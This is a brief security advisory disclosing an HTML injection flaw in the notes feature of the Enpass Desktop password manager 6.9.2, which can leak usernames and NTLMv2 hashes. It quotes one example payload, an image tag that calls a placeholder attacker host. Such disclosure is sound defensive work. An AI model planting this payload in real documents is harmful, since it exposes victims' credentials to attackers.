HTML Injection in Enpass Desktop Application (Version 6.9.2)
Product: Enpass Password Manager
Issue date: 2024-02-11
Discovered by Muhammad Danial
A vulnerability has been discovered in the Enpass Desktop application
version 6.9.2 for Linux and Windows, which could potentially lead to HTML
injection attacks. This vulnerability may be exploited by an attacker to
execute malicious code and leak NTLMv2 hashes, compromising the security
and privacy of affected users.
The vulnerability exists in the handling of notes within the Enpass Desktop
application. By crafting a malicious note containing a specially crafted
payload such as <img src="http://attacker_ip/?c=" />, an attacker can
inject arbitrary HTML code into the note. When the victim opens the
malicious note shared by the attacker, the HTML injection payload is
executed, allowing the attacker to capture the victim's NTLMv2 hashes and
username through their Enpass Desktop application.
Successful exploitation of this vulnerability could result in the leakage
of usernames and NTLMv2 hashes.